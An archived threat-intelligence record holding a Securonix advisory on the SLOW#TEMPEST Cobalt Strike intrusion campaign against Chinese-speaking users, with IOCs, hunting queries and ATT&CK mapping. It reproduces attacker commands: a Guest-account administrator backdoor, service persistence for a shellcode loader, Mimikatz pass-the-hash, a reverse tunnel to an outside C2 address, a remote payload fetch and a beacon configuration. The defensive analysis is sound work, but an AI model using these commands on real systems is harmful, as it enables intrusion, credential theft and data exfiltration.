{
	"id": "f6624c18-c2cc-493f-9b5b-d92603205bcf",
	"created_at": "2026-04-06T00:07:47.375415Z",
	"updated_at": "2026-04-10T03:24:23.579401Z",
	"deleted_at": null,
	"sha1_hash": "600f602047ed16b7d8d484e3b57b0bf336c01f2a",
	"title": "From Cobalt Strike to Mimikatz: A Deep Dive into the SLOW#TEMPEST Campaign Targeting Chinese Users",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4861070,
	"plain_text": "From Cobalt Strike to Mimikatz: A Deep Dive into the\r\nSLOW#TEMPEST Campaign Targeting Chinese Users\r\nArchived: 2026-04-05 19:40:26 UTC\r\nSecuronix Threat Research Security Advisory\r\nBy Securonix Threat Research: Den Iuzvyk, Tim Peck\r\nAug 29, 2024\r\ntldr:\r\nThe Securonix Threat Research team has uncovered a covert campaign targeting Chinese-speaking users with Cobalt\r\nStrike payloads likely delivered through phishing emails. The attackers managed to move laterally, establish persistence\r\nand remain undetected within the systems for more than two weeks.\r\nIn a recent attack campaign identified by Securonix threat researchers as SLOW#TEMPEST, malicious ZIP files are\r\nbeing distributed with the intent to deploy Cobalt Strike implants on targeted systems.\r\nThe campaign appears to specifically target victims within China, as evidenced by the file names and lures which are\r\npredominantly written in Chinese. Moreover, all of the command and control (C2) infrastructure used by the threat actors\r\nwas hosted in China by Shenzhen Tencent Computer Systems Company Limited, a Chinese owned company. Taking a\r\ndetailed look at telemetry data from the malicious samples indicate that the majority of the malware and files involved\r\noriginated from within China, further reinforcing the likelihood that China is indeed the primary target of this attack.\r\nRegarding the origin of the attack, we were unable to reach a definitive conclusion. Additionally, while we could not\r\nprecisely determine the attack vector, it appears to align with traditional phishing email tactics. In the case of\r\nSLOW#TEMPEST, it is likely that ZIP files (which were sometimes password-protected), were distributed via\r\nunsolicited emails.\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 1 of 16\n\n…\r\nWithin a timeline of more than two weeks, we were able to track the threat actors movements as they were able to\r\nescalate privileges, move laterally to other systems and establish persistence on each compromised host. We’ll highlight\r\neach of these tactics within this advisory.\r\nInitial infection\r\nCode execution begins through a shortcut (.lnk) file contained within a compressed archive (.zip) file. We analyzed a few\r\nsamples, one of which was “20240739人员名单信息.zip” which translates to: Personnel list information.\r\nSome samples such as the file mentioned above were password protected. This was a common tactic with Qakbot threat\r\nactors, where the password was supplied inside the body of the phishing email. Encrypting the zip file contents ensures\r\nthat email-based antivirus software would be unable to properly examine and flag any of the contained contents.\r\nOnce the zip file is opened and the password is supplied (if needed), the user is presented with a single LNK file\r\nmasquerading as a .docx file. One example contained a shortcut file named “违规远程控制软件人员名单.docx.lnk”\r\nwhich roughly translates to “List of people who violated the remote control software regulations”.\r\nGiven the language used in the lure files, it’s likely that specific Chinese related business or government sectors\r\ncould be targeted as they would both employ individuals who follow “remote control software regulations”.\r\nLure file \u0026 initial code analysis\r\nWhen the user executes the malicious LNK file, our code execution begins. It starts by running an executable file\r\ncontained within a rather odd directory structure containing references to “MACOS” metadata files. The first directory\r\nmasked by “????” is named “其他信息”  which translates to “Additional Information”.\r\nIt appears that the LNK file has its icon set to a 1.docx from within the same directory, however this file was not present\r\nwithin any of the zip files that we analyzed. This caused the file to appear as a blank or empty icon to the user.\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 2 of 16\n\nFigure 1: Analysis of 违规远程控制软件人员名单.docx.lnk\r\nThe odd directory structure can be seen in the figure below after running the “tree” command from within the parent\r\ndirectory.\r\nHidden are two files referenced by the LNK file: dui70.dll and UI.exe:\r\nFigure 2: Output of the “tree” command upon the extracted zip file contents\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 3 of 16\n\nDLL hijacking and Cobalt Strike implant execution\r\nLocated within the “\\其他信息\\.__MACOS__\\._MACOS_\\__MACOSX\\_MACOS_” directory are two files: dui70.dll\r\nand UI.exe. The file UI.exe is a legitimate signed executable by Microsoft which has been renamed from\r\nLicensingUI.exe.\r\nLicensingUI.exe is a legitimate system file in Windows which is responsible for displaying the user interface related to\r\nsoftware licensing and activation. The legitimate file is designed to import several legitimate DLL files, one of which is\r\ndui70.dll and should normally reside in C:\\Windows\\System32. However, thanks to a DLL path traversal vulnerability,\r\nany DLL containing the same name can be sideloaded upon the execution of the renamed UI.exe by the LNK file.\r\nAt the time of publication, this DLL sideloading or hijacking technique involving LicensingUI.exe appears to be\r\nunreported. Details regarding the binary file “UI.exe” and certificate validation can be found in the figure below:\r\nFigure 3: Cobalt Strike (DLL) and UI.exe (legitimate) file execution.\r\nThe DLL file is a Cobalt Strike implant which allows the attacker persistent and stealthy access to the system. We were\r\nable to extract its configuration and the details can be seen in Appendix A towards the end of this publication. In\r\nsummary, it’s programmed to beacon out to hxxp://123.207.74[.]22/mall_100_100.html over port 11443.\r\nThe beacon uses obfuscated network traffic described by the “Malleable_C2_Instructions” (Appendix A) and relies on\r\ncommon evasion techniques such as removing specific byte segments to bypass network-based detections.\r\nThe Cobalt Strike implant is programmed to inject itself into the Windows binary “runonce.exe”. This produced a process\r\nchain as seen in the any.run process tree below:\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 4 of 16\n\nFigure 4: Cobalt Strike process chain\r\nWith the attackers hooked into the runonce.exe process, our team was able to observe much of the initial staging and\r\nenumeration activity.\r\nPost-Exploitation – Attackers hands on keyboard\r\nNow that the attackers had complete control over the target host, we observed initial post exploitation activity which\r\nconsisted of setting up a staging directory, and downloading additional enumeration and attack tools to the host.\r\nFirst, the attackers created the following directory to stage from: C:\\Windows\\Temp\\tmp\r\nNext, several binary files were downloaded into the directory:\r\nfpr.exe: Unknown executable\r\niox.exe: A tool for port forwarding and setting up proxied connections\r\nfscan.exe: A well-known scanner in red teaming for identifying live hosts and open ports. The output file is\r\n“result.txt”\r\nnetspy.exe: A network reconnaissance tool used for capturing network traffic or scanning for network\r\nvulnerabilities. The log files are netspy.log and alive.txt\r\nlld.exe: A shellcode loader binary which in our case loaded and executed raw shellcode saved in:\r\nC:/Windows/Temp/tmp/tmp.log\r\nxxx.txt: Same as tmp.log before it was renamed\r\ntmp.log: A file containing shellcode to be executed by lld.exe\r\nsharpdecryptpwd.exe: A command-line based utility that collects and dumps cached credentials from installed\r\napplications such as Navicat, TeamViewer, FileZilla, WinSCP and Xmanager\r\npvefindaduser.exe: Used for Windows Active Directory (AD) user enumeration.\r\nnew text document.txt: unknown – we were not able to capture this file\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 5 of 16\n\ngogo_windows_amd64.exe: Seems related to an open source project “Nemo” which automates enumeration tools\r\nsuch as Nmap, Massscan and many others. Outputs “.sock.lock” and “output.txt” files.\r\nEach of these utilities or tools were executed by the attacker in series. The network port forwarding and tunneling utility\r\n“iox.exe” was used to establish tunnels with external infrastructure (49.235.152[.]72:8282), enabling them to exfiltrate\r\ncaptured enumeration information and other data out of the compromised network.\r\nPrivilege Escalation and Persistence\r\nThe attackers managed to maintain persistent access to the compromised environment by creating a scheduled task named\r\n“windowsinspectionupdate.” This task is designed to execute a malicious executable “lld.exe” at regular intervals. The\r\n“lld.exe” file is a key component in the attackers toolkit, specifically used to execute shellcode, which can run arbitrary\r\ncode directly in memory. Its stealthy nature makes it effective at bypassing traditional security controls.\r\nBy scheduling this task, the attackers ensure that “lld.exe” is executed repeatedly, allowing them to re-establish or\r\nmaintain control over the compromised system even after reboots or network disruptions. This persistence mechanism is\r\nparticularly effective because it can survive system restarts, making it difficult to completely remove the attacker’s\r\nfoothold without identifying and deleting the scheduled task.\r\nThe executed command set by task scheduler is:\r\ncmd /c start c:/windows/temp/tmp/lld.exe c:/windows/temp/tmp/tmp.log\r\nUser and group modification\r\nThe attackers further enabled themselves to hide in the weeds in compromised systems by manually elevating the\r\nprivileges of the built-in Guest user account. This account, typically disabled and minimally privileged, was transformed\r\ninto a powerful access point by adding it to the critical administrative group and assigning it a new password.\r\ncmd.exe /c net user guest\r\ncmd.exe /c net localgroup administrators guest /add\r\ncmd.exe /c net localgroup “remote desktop users” guest /add\r\ncmd.exe /c net user guest 1qaz@wsx\r\ncmd.exe /c net user guest\r\ncmd.exe /c net user guest /active:yes\r\ncmd.exe /c net user guest\r\nThe attacker’s manipulation of the Guest account significantly increases the security risks to the system. By converting a\r\nlow-privilege, usually disabled account into one with administrative and remote access capabilities, the attacker has\r\ncreated a powerful backdoor that can be easily overlooked. This backdoor allows them to maintain access to the system\r\nwith minimal detection, as the Guest account is often not monitored as closely as other user accounts.\r\nNext, the attackers launched network scans, mostly through the “iox.exe” utility, identifying and probing additional\r\ninternal systems (e.g., MSSQL servers and specific subnets).\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 6 of 16\n\nPersistence through Windows services\r\nThe attackers further ensured their persistence within the compromised environment by manually executing a series of\r\ncommands to install a malicious service. This service, named “windowsinspectionupdate,” was specifically designed to\r\nrun a single executable “lld.exe” with a single file as input “tmp.log” each time the system starts up. If you recall, the\r\npurpose of this executable is to execute a shellcode file. This technique allows the attacker to maintain ongoing access to\r\nthe compromised system even after it is rebooted or encounters other interruptions.\r\nThe service was observed being created using the following sequence of commands:\r\ncmd.exe /c start /b lld.exe xxx.txt\r\ncmd.exe /c move xxx.txt tmp.log\r\ncmd.exe /c sc create “windowsinspectionupdate” binpath= “cmd /c start c:/windows/temp/tmp/lld.exe\r\nc:/windows/temp/tmp/tmp.log”\r\ncmd.exe /c sc description windowsinspectionupdate “windows inspection integrity”\r\ncmd.exe /c sc config windowsinspectionupdate start= auto\r\nLateral movement and credential harvesting\r\nThe attackers moved laterally across the network primarily by using RDP (Remote Desktop Protocol). They first\r\nattempted making unsuccessful login attempts to other systems using the user account that was initially compromised.\r\n Eventually, a successful RDP connection was established from the hostname to another domain-joined server. Once\r\ninside, they launched multiple reconnaissance and scanning tools such as fscan.exe and netspy.exe. According to the\r\nintercepted results text file outputted by the tools, five hosts had open ports that the attackers began enumerating.\r\nThey also used credential theft tools like sharpdecryptpwd.exe to extract stored credentials from browsers (Chrome\r\nbrowser in this attack chain). Stored credentials in the browser were then used to authenticate and pivot across the\r\nnetwork into other systems.\r\ncmd.exe /c sharpdecryptpwd.exe chrome\r\nWe observed the Windows credential dumping utility Mimikatz being used from the Cobalt Strike process “lld.exe”. In\r\naddition, the attackers attempted to pass the hash as one of the captured users and hash combinations. The user targeted\r\nthe mstc.exe process which is the executable for Microsoft’s Remote Desktop Connection tool. The following captured\r\ncommand initiates an RDP session as the targeted user. The use of the /restrictedadmin flag ensures that the user’s\r\ncredentials will not be sent over the network, which may reduce network-based detections.\r\nsekurlsa::pth /user:[REDACTED] /domain:[REDACTED] /ntlm:[REDACTED] “/run:mstsc.exe /restrictedadmin”\r\nIn another attempt to move laterally, the harvested credentials from mimikatz were used. Also, through the Cobalt Strike\r\nimplant the attackers first attempted to authenticate as the administrator user by passing the hash against a list of gathered\r\nIP addresses contained inside an ip.txt file.\r\ncrackmapexec smb ip.txt -u [REDACTED_DOMAIN]/Administrator -H [REDACTED_HASH]\r\nA short time later we observed psexec.py being used to target specific IP addresses:\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 7 of 16\n\npython3 psexec.py [REDACTED_USER]@[REDACTED_IP] -hashes [REDACTED_HASH] -codec gbk\r\nDisable “Restricted Admin Mode” in LSA\r\nInitially, the attackers used RDP to establish internal remote connections. As they moved laterally, they executed registry\r\ncommands to disable the “Restricted Admin Mode” by setting the disablerestrictedadmin value to 0 in the Windows\r\nRegistry.. Restricted Admin Mode is a security feature introduced in newer versions of Windows that limits credential\r\nexposure when connecting to a remote system via Remote Desktop Protocol (RDP).\r\ncmd.exe /c reg add “HKLM\\System\\CurrentControlSet\\control\\lsa” /v disablerestrictedadmin /t reg_dword /d 00000000\r\n/f\r\nThe change was then verified using the command:\r\ncmd.exe /c reg query “hklm\\system\\currentcontrolset\\control\\lsa” | findstr “disablerestrictedadmin”\r\nRe-establish remote connections\r\nOnce the attackers pivoted successfully into other systems, iox.exe was used to establish another remote connection back\r\nto their C2 server:\r\ncmd.exe /c start /b iox.exe proxy -r *49.235.152[.]72:8282 -k 616161\r\nBloodhound for domain enumeration\r\nAs part of the post-exploitation/lateral movement phase, the attackers deployed BloodHound, a powerful tool used for\r\nactive directory (AD) reconnaissance. BloodHound is designed to map out and analyze relationships within an AD\r\nenvironment giving the attackers detailed data to identify and exploit potential pathways for privilege escalation and\r\nlateral movement.\r\nDuring the course of the SLOW#TEMPEST campaign, BloodHound was executed via the runonce.exe process, which if\r\nyou remember was the target or exit process from Cobalt Strike. Once deployed, BloodHound collected extensive data on\r\nthe AD environment, including information on users, computers, groups, organizational units, group policy objects, and\r\nother domain component information.\r\nThe data collected by BloodHound was then compiled into several .json files providing a detailed map of the AD\r\nstructure. These files were subsequently compressed into a BloodHound.zip archive. Once exfiltrated, the attackers are\r\nable to analyze the data in detail on their own systems.\r\nAdditional enumeration commands\r\nThese commands were captured on several systems. The attackers used a mix of built-in Windows utilities such as ping,\r\nnetstat and tasklist, for example, to scan or probe their environment. The Chinese-based public IP information website\r\n(hxxp://myip[.]ipip.net) was also probed using “curl” to grab the system’s public IP address.\r\nGeneral system enumeration commands\r\ncmd.exe /c ipconfig\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 8 of 16\n\ncmd.exe /c wevtutil cl “windows powershell”\r\ncmd.exe /c ping [REDACTED]\r\ncmd.exe /c tasklist /svc\r\ncmd.exe /c systeminfo\r\ncmd.exe /c net time /domain\r\ncmd.exe /c ping dc.[REDACTED] -c 2\r\ncmd.exe /c net\r\ncmd.exe /c net user /domain\r\ncmd.exe /c net user [REDACTED] /domain\r\ncmd.exe /c start /b fpr.exe\r\ncmd.exe /c netstat -ano\r\ncmd.exe /c whoami\r\ncmd.exe /c fpr.exe\r\ncmd.exe /c ping 123.56.168[.]30\r\ncmd.exe /c net user [REDACTED] /domain\r\nnet1  user [REDACTED] /domain\r\ncmd.exe /c netstat -ano | findstr 3398\r\nnetstat  -ano |findstr  established\r\nProxy connection using iox.exe\r\ncmd.exe /c start /b iox.exe proxy -r *49.235.152[.]72:8282 -k 616161\r\ncmd.exe /c curl hxxp://myip.ipip[.]net\r\nExecute shellcode, move the file for new service\r\ncmd.exe /c start /b lld.exe xxx.txt\r\ncmd.exe /c move xxx.txt tmp.log\r\nEnumerate local subnet using fscan.exe\r\ncmd.exe /c fscan.exe  -h [REDACTED]/24\r\ncmd.exe /c fscan.exe  -hf alive.txt\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 9 of 16\n\nFind AD users\r\npvefindaduser.exe  -current -noping -os\r\nNemo network enumeration\r\ngogo_windows_amd64.exe  -i [REDACTED]/24 -p all -f output.txt\r\ngogo_windows_amd64.exe  -i [REDACTED]/24 -p 445 -f output.txt\r\ngogo_windows_amd64.exe\r\ngogo_windows_amd64.exe  [REDACTED]/24 -p 445\r\ngogo_windows_amd64.exe  -i [REDACTED]/24 -p 445\r\nAttacker infrastructure analysis\r\nWhile the attack was ongoing, we were able to observe key details of the attack. Some of these included OPSEC\r\n(Operational Security) failures from the attackers. One example was capturing Cobalt Strike commands. We observed\r\nseveral instances where some of these OPSEC failures resulted in providing us with unintended details regarding\r\nusernames and system information as to the attacker’s infrastructure. For example, take the following captured Cobalt\r\nStrike command:\r\nexecute-assembly /Users/apple/Desktop/C++/sb.exe -e hxxps://360-1305242994.cos.ap-nanjing.myqcloud[.]com/wel/ns/sa64.gif -s c:\\\\windows\\\\system32\\\\runonce.exe -a “browser -b all -z” –disable-bypass-cmdline –disable-bypass-amsi –disable-bypass-etw\r\nThe command captured from the attacker provides insight into the execution of a payload using Cobalt Strike’s execute-assembly module. A binary was passed in from “/Users/apple/Desktop/C++/sb.exe” which indicates that according to the\r\ndirectory structure, the attacker was running Cobalt Strike from a macOS environment. This isn’t technically new as there\r\nhas been observed activity back as far as 2022 through Geacon.\r\nThe sb.exe process appears to be a compiled version of SharpBlock, an open source tool which allows for bypassing EDR\r\nand Microsoft’s Anti-Malware Scan Interface (AMSI), to implant specified processes controlled by the attacker. The\r\nsa64.gif is a renamed copy of searchall64.exe, an open source utility named searchall which is designed to search for\r\nsensitive information on the target machine including usernames, passwords, account details.\r\nFrom within the same Cobalt Strike session we observed file execution from the following local path which provided us\r\nwith another username, this time “guoyansong”, which could be short for Guoyan Song, a valid first and last name in\r\nChinese.\r\n/Users/guoyansong/D/gongju/????/??????/????/SharpWeb.exe\r\nLastly, all of the IP addresses were hosted in China via Shenzhen Tencent Computer Systems Company Limited. The\r\npayload hosted at 360-1305242994.cos.ap-nanjing.myqcloud[.]com, is also hosted by the Chinese company Tencent, via\r\na Tencent Cloud Object Storage (COS) resource.\r\nWrapping up…\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 10 of 16\n\nThe discovery of the SLOW#TEMPEST campaign by the Securonix threat research team reveals a highly organized and\r\nsophisticated attack targeting Chinese speaking users. Although there was no solid evidence linking this attack to any\r\nknown APT groups, it is likely orchestrated by a seasoned threat actor who had experience using advanced exploitation\r\nframeworks such as CobaltStrike and a wide range of other post-exploitation tools. The campaign’s complexity is evident\r\nin its methodical approach to initial compromise, persistence, privilege escalation and lateral movement across the\r\nnetwork.\r\nThe use of undocumented DLL injection techniques, such as exploiting the Microsoft-signed executable LicensingUI.exe\r\nand deploying BloodHound for Active Directory reconnaissance, exemplifies the advanced nature of this attack.\r\nAdditionally, the careful steps taken by the threat actor to ensure persistence through the creation of scheduled tasks and\r\nelevation of user privileges highlight the attackers intent to maintain long-term control over the targeted systems, which\r\nin this case lasted over two weeks.\r\nSecuronix recommendations\r\nThe key indicators of compromise identified in this investigation serve as critical data points for security teams aiming to\r\ndetect and respond to similar threats in their environments. By understanding the methods and tools used by attackers in\r\nthis campaign, defenders can better prepare to protect their networks from these advanced persistent threats.\r\nAs this campaign likely started using phishing emails, avoid downloading files or attachments from external\r\nsources, especially if the source was unsolicited. Common file types include zip, rar, iso, and pdf. Zip files,\r\nsometimes password protected,  were used during this campaign.\r\nMonitor common malware staging directories, especially script-related activity in world-writable directories. In\r\nthe case of this campaign the threat actors staged in subdirectories in C:\\ProgramData , C:\\Windows\\Temp as well\r\nas the user’s %APPDATA% directory.\r\nThrough various phases of the SLOW#TEMPEST campaign, the threat actors leveraged encrypted channels over\r\nvarious ports to evade detection. Because of this, we strongly recommend deploying robust endpoint logging\r\ncapabilities. This includes leveraging additional process-level logging such as Sysmon and PowerShell logging for\r\nadditional log detection coverage.\r\nSecuronix customers can scan endpoints using the Securonix hunting queries below.\r\nMITRE ATT\u0026CK Matrix\r\nTactics Techniques\r\nInitial Access\r\nT1078.001: Valid Accounts: Default Accounts\r\nT1566.001: Phishing: Spearphishing Attachment\r\nCollection T1560: Archive Collected Data\r\nCommand and Control T1132: Data Encoding\r\nCredential Access\r\nT1003: OS Credential Dumping\r\nT1555: Credentials from Password Stores\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 11 of 16\n\nDefense Evasion\r\nT1070.004: Indicator Removal: File Deletion\r\nT1562.001: Impair Defenses: Disable or Modify Tools\r\nT1574.001: Hijack Execution Flow: DLL Search Order Hijacking\r\nT1620: Reflective Code Loading\r\nDiscovery\r\nT1033: System Owner/User Discovery\r\nT1057: Process Discovery\r\nT1069: Permission Groups Discovery: Domain Groups\r\nT1082: System Information Discovery\r\nExecution\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1059.006: Command and Scripting Interpreter: Python\r\nT1569.002: System Services: Service Execution\r\nT1204.001: User Execution: Malicious Link\r\nT1204.002: User Execution: Malicious File\r\nLateral Movement\r\nT1021.001: Remote Services: Remote Desktop Protocol\r\nT1550.002: Use Alternate Authentication Material: Pass the Hash\r\nPersistence T1053: Scheduled Task/Job\r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nRelevant Securonix detections\r\nEDR-ALL-923-RU\r\nEDR-ALL-950-RU\r\nEDR-ALL-984-RU\r\nEDR-ALL-975-RU\r\nEDR-ALL-1023-RU\r\nEDR-ALL-1057-RU\r\nEDR-ALL-1294-RU\r\nEDR-ALL-1301-RU\r\nEDR-ALL-1306-RU\r\nRelevant hunting queries\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 12 of 16\n\n(remove square brackets “[ ]” for IP addresses or URLs)\r\nindex = activity AND rg_functionality = “Web Proxy” AND (destinationaddress = “123.207.74[.]22” OR\r\ndestinationaddress = “123.56.168[.]30” OR destinationaddress = “49.235.152[.]72”)\r\nindex = activity AND rg_functionality = “Next Generation Firewall” AND (destinationhostname CONTAINS\r\n“myip.ipip[.]net” OR destinationhostname CONTAINS “360-1305242994.cos.ap-nanjing.myqcloud[.]com” )\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Network\r\nconnection detected” OR deviceaction = “Network connection detected (rule: NetworkConnect)”) AND\r\n(destinationport=”11443″ OR destinationport=”8282″)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “File created”\r\nOR deviceaction = “File created (rule: FileCreate)”) AND customstring49 STARTS WITH\r\n“C:\\Windows\\Temp\\tmp”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction\r\n= “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND customstring49\r\nSTARTS WITH “C:\\Windows\\Temp\\tmp”\r\nC2 and infrastructure\r\nC2 Address\r\n123.207.74[.]22\r\n123.56.168[.]30\r\n49.235.152[.]72\r\nmyip.ipip[.]net\r\n360-1305242994.cos.ap-nanjing.myqcloud[.]com/wel/ns/sa64.gif\r\nAnalyzed files/hashes\r\nFile Name SHA256\r\nArchive.zip (renamed)\r\n8e77101d3f615a58b8d759e8b82ca3dffd4823b9f72dc5c6989bb4311bdffa86\r\n04bcf25d07e5cf060e742325d6123242f262888705acac649f8d5010a5eb6a87\r\nc35ea8498ed7ae33513e26fac321fecf0fc9306dda8c783904968e3c51648c37\r\n20240739人员名单信\r\n息.zip\r\n3a9b64a61f6373ee427f27726460e7047b21ddcfd1d0d45ee4145192327a0408\r\n╠Õ╝ý▒¿©µ.lnk 28030E8CF4C9C39665A0552E82DA86781B00F099E240DB83F1D1A3AE0E990AB6\r\n违规远程控制软件人员\r\n名单.docx.lnk\r\n1BA77DD1F5BF31D45FDB160C52EBE5829EC373350CDE35818FB90D45352B3601\r\ndui70.dll 1189D34E983A6FC9D2DC37AD591287C9E3E4D4BA83F66C7EDE692C36274BA648\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 13 of 16\n\ngogo_windows_amd64.exe 706BD7E05F275814C3B86EEC1A87148662029D91D0CE9B80386AAFFE7AA3753B\r\niox.exe C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731\r\nLLD.exe 0BD048E0BCE956EDFBCEE6EDF32B8B67E08275BD38125B40A98665FAB4926C9D\r\nnetspy.exe 97C5CD06B543B0BDB270666092348EFBA0A9670AF05B11F3B56BF4B418DEC43A\r\nPVEFindADUser.exe 7DC0E13A5F1A70C4E41F4B92372259B050A395104650D57385ECAA148481AE5C\r\nfpr.exe 1F510DED0D181B4636E83C69B66C92465DC0E64F6DB946FA4C246E7741F66141\r\nsharpdecryptpwd.exe 9F650117288B26312E84F32E23783FE3C81FCBA771C8AE58119BE92344C006CC\r\npvefindaduser.exe 7DC0E13A5F1A70C4E41F4B92372259B050A395104650D57385ECAA148481AE5C\r\ntmp.log EFE53F18D282516149BC6FEAC44C17DDE9F0704D95598AECBA3E7D734727B07E\r\nsa64.gif 33A910162EAFE750316ADFAD4AB0955BE24C1BA048C2EC236C95E4A795C42932\r\nReferences\r\n1. QakBot Malware Bypass Windows Security Using Unpatched Vulnerability\r\nhttps://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature\r\n2. HackTricks: Dll Hijacking\r\nhttps://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dll-hijacking\r\n3. Geacon Brings Cobalt Strike Capabilities to macOS Threat Actors\r\nhttps://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/\r\nAppendix A: Cobalt Strike Configuration\r\n{\r\n  “BeaconType”: [\r\n      “HTTP”\r\n  ],\r\n  “Port”: 11443,\r\n  “SleepTime”: 10000,\r\n  “MaxGetSize”: 6148882,\r\n  “Jitter”: 37,\r\n  “C2Server”: “123.207.74[.]22,/mall_100_100.html”,\r\n  “HttpPostUri”: “/ajax/recharge/recharge.json”,\r\n  “Malleable_C2_Instructions”: [\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 14 of 16\n\n“Remove 2085 bytes from the end”,\r\n      “Remove 2085 bytes from the beginning”,\r\n      “Remove 712 bytes from the beginning”,\r\n      “NetBIOS decode ‘a’”\r\n  ],\r\n  “HttpGet_Verb”: “GET”,\r\n  “HttpPost_Verb”: “POST”,\r\n  “HttpPostChunk”: 0,\r\n  “Spawnto_x86”: “%windir%\\\\syswow64\\\\runonce.exe”,\r\n  “Spawnto_x64”: “%windir%\\\\sysnative\\\\runonce.exe”,\r\n  “CryptoScheme”: 0,\r\n  “Proxy_Behavior”: “Use IE settings”,\r\n  “Watermark”: 666666666,\r\n  “bStageCleanup”: “True”,\r\n  “bCFGCaution”: “True”,\r\n  “KillDate”: 0,\r\n  “bProcInject_StartRWX”: “False”,\r\n  “bProcInject_UseRWX”: “False”,\r\n  “bProcInject_MinAllocSize”: 18700,\r\n  “ProcInject_PrependAppend_x86”: [\r\n      “kJCQkA==”,\r\n      “kJCQkA==”\r\n  ],\r\n  “ProcInject_PrependAppend_x64”: [\r\n      “kJCQkA==”,\r\n      “kJCQkA==”\r\n  ],\r\n  “ProcInject_Execute”: [\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 15 of 16\n\n“CreateThread”,\r\n      “SetThreadContext”,\r\n      “NtQueueApcThread-s”,\r\n      “RtlCreateUserThread”,\r\n      “kernel32.dll:LoadLibraryA”\r\n  ],\r\n  “ProcInject_AllocationMethod”: “VirtualAllocEx”,\r\n  “bUsesCookies”: “True”,\r\n  “HostHeader”: “”\r\n}\r\nSource: https://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/"
	],
	"report_names": [
		"from-cobalt-strike-to-mimikatz-slowtempest"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434067,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/600f602047ed16b7d8d484e3b57b0bf336c01f2a.pdf",
		"text": "https://archive.orkl.eu/600f602047ed16b7d8d484e3b57b0bf336c01f2a.txt",
		"img": "https://archive.orkl.eu/600f602047ed16b7d8d484e3b57b0bf336c01f2a.jpg"
	}
}